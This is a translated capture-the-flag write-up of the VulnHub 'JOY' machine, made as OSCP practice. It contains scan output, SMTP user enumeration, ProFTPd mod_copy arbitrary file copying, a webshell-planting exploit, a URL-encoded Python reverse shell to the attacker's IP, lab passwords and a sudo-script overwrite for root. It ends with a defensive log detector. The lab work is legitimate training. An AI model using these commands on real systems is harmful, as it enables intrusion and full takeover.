WeChat official account: 泷羽Sec-尘宇安全
Preface
OSCP preparation, OSCP series: the JOY box. Information gathering, the ProFTPd 1.3.5 remote command execution vulnerability, and information gathering + the ProFTPd 1.3.5 vulnerability for privilege escalation.
Difficulty: easy
- Getting the low-privilege shell involves: information gathering, the ProFTPd 1.3.5 remote command execution vulnerability
- Privilege escalation: information gathering + privilege escalation via the ProFTPd 1.3.5 vulnerability
Download:
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
nmap
Host discovery
└─# nmap -sn 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:20 CST
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00017s latency).
MAC Address: 08:00:27:C3:F3:FA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00049s latency).
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.84 seconds
Port scan
└─# nmap --min-rate 10000 -p- 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:21 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 192.168.56.105
Host is up (0.00043s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 40.45 seconds
└─# nmap --min-rate 10000 -p- 192.168.56.105 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:22 CST
Warning: 192.168.56.105 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.105
Host is up (0.0011s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
123/udp open ntp
137/udp open netbios-ns
161/udp open snmp
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 72.96 seconds
Detailed port scan
└─# nmap -sV -sT -sC -O -p$ports 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 23:23 CST
Nmap scan report for 192.168.56.105
Host is up (0.00082s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: TOP STLS SASL PIPELINING CAPA AUTH-RESP-CODE UIDL RESP-CODES
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE ID LOGIN-REFERRALS have post-login Pre-login ENABLE capabilities IMAP4rev1 listed STARTTLS SASL-IR LOGINDISABLEDA0001 LITERAL+ more OK
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_imap-capabilities: ID LOGIN-REFERRALS more have Pre-login ENABLE capabilities IMAP4rev1 post-login listed SASL-IR IDLE LITERAL+ AUTH=PLAINA0001 OK
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP USER SASL(PLAIN) PIPELINING CAPA AUTH-RESP-CODE UIDL RESP-CODES
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:43:E6:D2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-02-18T15:23:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2025-02-18T23:23:43+08:00
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.60 seconds
Information gathering
FTP, 21
The nmap scan shows:
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
Log in and take a look.
There are quite a few files, so download them recursively:
wget -r ftp://192.168.56.105:21
Have a look:
└─# cat *
Patrick's Directory
total 148
drwxr-xr-x 18 patrick patrick 4096 Feb 19 00:05 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Feb 19 00:05 1imQukyUK19Pl17qXfEYUVMtwzBfku5QbhxrPQJCkJoJJt5IfcwbDXmdIsEcHIKl.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:15 4Cj4XhDr2jsgd2zlJF73yPgMLihZlQs5BZ4KG7Z4Kot7evmPzbkfFjdLMAYATxIt.txt
-rw-r--r-- 1 patrick patrick 0 Feb 19 00:00 5tA4ZOUkrV7KTBdkSYXSxnAH1s3CXqdm.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:35 9ezdGG9hlWdEstBKVHwhH135FuhXcesZ.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:50 9yw2FYOlL3kPJOYCvyE5J1udgeNGVOsSC2sRMxFLsS4EwZRFqVWC691lBQCY7IcW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:25 akzHGaS5Fvs51NWKaMoYqTDugJWwTthz.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:55 Bo0WZoYeqzJRni8rqeJNaIJONypltxP5.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:25 BsJPUK1ErX1VD2pQpslLrVLsodufgwLnKxl2dnwCeZ003rImlgwt03qazky8q4ov.txt
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:20 Drog8FITLbe50UcOIkVg8mMoWMPcLxD1qzhXZackYv6vmIgIYqzMk6oNS1AUf0gh.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:45 DXwuAUIO4hTtHfSUX70BsOOZw6KaxOwjcec0Z1lZPFiGNGe8bdzIr2lvYXSa8IRW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:15 EFHNIz6Jhbi9Wz6FkZoINkqTCEt9wTJX.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:50 iK0PkNFU2txJbSkcGJ96inhla94CT8dn.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:35 IkQp812B6MANVspW9yIeKZmIlC8blULu7U2hZNxtrw3nnNHV5CH7nQa9nqMKfbjk.txt
-rw-r--r-- 1 patrick patrick 24 Feb 19 00:00 jsHyHpJxTeKqXbdislyT182MZlnL7y5Y7TDATWPDDWEKazDqeycSHqh4jhhHXQhk.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:55 qeMAXlcBL3RYd5fYRzSCfzrYxlkOTRNghwD7OXyGh4Jtc2bnQ4Rm7HtuVe50Iq5H.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:20 SVVa34bwxkTdPwBdMBsJAxu72xi9lONd.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:40 tZocedGOcVcSmUdfwby7gSs3gqKTEJbef5Xam3J8OrIcf1FME3JgfwLEIErMYUZf.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:30 UsAr9HtRbwqLJxQEashDN6x99kiX9C1k.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:40 xpk7hnbm1QK8AqXKFrNpg1VGtU19PJOC.txt
-rw-r--r-- 1 patrick patrick 24 Feb 18 23:30 YLau2QcLUAuXioJ9B2RFV5OGYWkB7wV5HWv9KSEo1jvw5Ul31x7WGDOyDx7tFWUW.txt
-rw-r--r-- 1 patrick patrick 0 Feb 19 00:05 yPA7qqLRtqTSloMkQXT2YXiy9rnytR2v.txt
-rw-r--r-- 1 patrick patrick 0 Feb 18 23:45 Zqt7ERU4rlPrerglGeJQhs4aElSmcd6F.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
This is a brave project!
What happens when you have no idea what you are doing? Bang your head against the wall.
colour
airline
skilled footballer!
Perhaps the head of development is secretly a sicko...
either a dog name, or the name of a lottery in singapore
ONE!
wine app
you only live once!
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater
Lock down this machine!
Went through all of it; nothing useful apart from the contents of the Directory file. One file named version_control is worth a closer look. Based on the user name, the guessed path is /home/patrick/version_control. Use telnet to copy the file into the download folder under FTP, /home/ftp/download/, first:
telnet 192.168.56.105 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/download/version_control
The difference between the telnet and ftp commands:
After connecting with telnet, the user's host effectively becomes a virtual (dumb) terminal of the remote TELNET server: everything runs on the remote server, but the user cannot download or upload files from it or copy files to the local host.
ftp is different: it uses a client/server model, so the user can work with directories on the FTP server and upload or download files, but cannot ask the server to execute a file.
Then download the copied file.
Looking at it, the versions are:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
It also exposes the web root:
/var/www/tryingharderisjoy
SMTP, 25
└─# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.56.105
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 175
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Wed Feb 19 00:20:02 2025 #########
192.168.56.105: _apt exists
192.168.56.105: avahi exists
192.168.56.105: backup exists
192.168.56.105: bin exists
192.168.56.105: colord exists
192.168.56.105: daemon exists
192.168.56.105: dnsmasq exists
192.168.56.105: games exists
192.168.56.105: ftp exists
192.168.56.105: gnats exists
192.168.56.105: geoclue exists
192.168.56.105: hplip exists
192.168.56.105: irc exists
192.168.56.105: list exists
192.168.56.105: lp exists
192.168.56.105: man exists
192.168.56.105: mail exists
192.168.56.105: messagebus exists
192.168.56.105: news exists
192.168.56.105: mysql exists
192.168.56.105: nobody exists
192.168.56.105: ntp exists
192.168.56.105: postfix exists
192.168.56.105: postmaster exists
192.168.56.105: pulse exists
192.168.56.105: proxy exists
192.168.56.105: root exists
192.168.56.105: ROOT exists
192.168.56.105: rtkit exists
192.168.56.105: saned exists
192.168.56.105: speech-dispatcher exists
192.168.56.105: sync exists
192.168.56.105: sys exists
192.168.56.105: systemd-bus-proxy exists
192.168.56.105: systemd-network exists
192.168.56.105: systemd-timesync exists
192.168.56.105: systemd-resolve exists
192.168.56.105: usbmux exists
192.168.56.105: uucp exists
192.168.56.105: www-data exists
######## Scan completed at Wed Feb 19 00:20:03 2025 #########
40 results.
175 queries in 1 seconds (175.0 queries / sec)
Extract the user names:
awk '/exists/ {print $2}' user > u
This gives the list of user names (the unfiltered awk '{print $2}' that was originally run also picked up stray words from the header and summary lines, which is why they appear below):
Processes
file
count
count
TCP
timeout
domain
Scan
_apt
avahi
backup
bin
colord
daemon
dnsmasq
ftp
geoclue
games
gnats
hplip
irc
list
lp
mail
man
messagebus
mysql
news
nobody
ntp
postfix
postmaster
proxy
pulse
root
ROOT
rtkit
saned
speech-dispatcher
sync
sys
systemd-bus-proxy
systemd-resolve
systemd-network
systemd-timesync
usbmux
uucp
www-data
Scan
results.
queries
Web page, 80
A search only turns up a denial-of-service vulnerability.
Directory scan
Went through it; nothing useful found.
SMB, 139 & 445
Got some user names:
Administrators
Users
Guests
Power
Account
Server
Print
patrick
ftp
nobody
None
None of it seems useful.
Exploitation
FTP: ProFTPd 1.3.5 remote command execution
Searching on the version found earlier shows a remote command execution vulnerability.
None of those scripts worked, though; an online search turned up
https://github.com/t0kx/exploit-CVE-2015-3306
which uploaded the webshell successfully. This vulnerability was in fact already used earlier: the site cpfr and site cpto commands read and write arbitrary files.
python exploit.py --host 192.168.56.105 --port 21 --path "/var/www/tryingharderisjoy"
Check it:
Get a reverse shell:
http://192.168.56.105/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.104%22,6666));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
Reverse shell obtained.
Privilege escalation
Information gathering
The kernel version is fairly recent, so kernel exploits were dropped in favour of enumeration. In the web root there is a file containing some account information:
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
Switching users, only patrick's password is correct.
sudo -l shows that /home/patrick/script/test can be run without a password, but there is no permission to access the file.
So the ProFTPd 1.3.5 vulnerability is needed again: the site cpfr and site cpto commands read and write arbitrary files.
The first attempt was to replace /etc/passwd, but that failed, so replace the /home/patrick/script/test file instead.
First upload an executable file via FTP:
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
Then use telnet to copy it into place:
telnet 192.168.56.105 21
site cpfr /home/ftp/download/test
site cpto /home/patrick/script/test
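As an added defensive example (not part of the original post): a small Python log check that flags the mod_copy SITE CPFR/CPTO pattern used above, both when it comes from an anonymous session and when either path leaves the FTP root. The log layout, the sample lines and the /home/ftp root are constructed assumptions, not real ProFTPD log output.

```python
import os
import re

# Constructed sample log (not real ProFTPD output). Assumed layout per line:
#   <timestamp> <client-ip> <user> <command> [<argument>]
SAMPLE_LOG = """\
2025-02-18T23:40:01 192.168.56.104 anonymous USER anonymous
2025-02-18T23:40:02 192.168.56.104 anonymous SITE CPFR /home/patrick/version_control
2025-02-18T23:40:02 192.168.56.104 anonymous SITE CPTO /home/ftp/download/version_control
2025-02-18T23:41:10 192.168.56.104 anonymous SITE CPFR /home/ftp/upload/x.php
2025-02-18T23:41:10 192.168.56.104 anonymous SITE CPTO /var/www/tryingharderisjoy/backdoor.php
2025-02-18T23:42:00 192.168.56.50 bob SITE CPFR upload/a.txt
2025-02-18T23:42:01 192.168.56.50 bob SITE CPTO download/a.txt
"""

ANON_USERS = {"anonymous", "ftp"}   # anonymous logins are mapped to the ftp user
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)(?: (.*))?$")


def outside_root(path: str, ftp_root: str) -> bool:
    """True when path (absolute, or relative to ftp_root) escapes ftp_root after normalisation."""
    if not path.startswith("/"):
        path = os.path.join(ftp_root, path)
    return os.path.commonpath([os.path.normpath(path), ftp_root]) != ftp_root


def detect(log: str, ftp_root: str = "/home/ftp") -> list:
    """Return one alert dict per suspicious SITE CPFR/CPTO command in the log."""
    alerts = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, user, cmd, arg = m.groups()
        if cmd.upper() != "SITE" or not arg:
            continue
        sub, _, path = arg.partition(" ")
        sub = sub.upper()
        if sub not in ("CPFR", "CPTO"):
            continue
        reasons = []
        if user.lower() in ANON_USERS:
            reasons.append("mod_copy command from anonymous session")
        if outside_root(path, ftp_root):
            reasons.append(f"{sub} path escapes the FTP root")
        for reason in reasons:
            alerts.append({"time": ts, "client": ip, "user": user,
                           "command": f"{sub} {path}", "reason": reason})
    return alerts
```

On a real server the fix is to upgrade ProFTPD or disable mod_copy; this check only helps spot the pattern in logs after the fact.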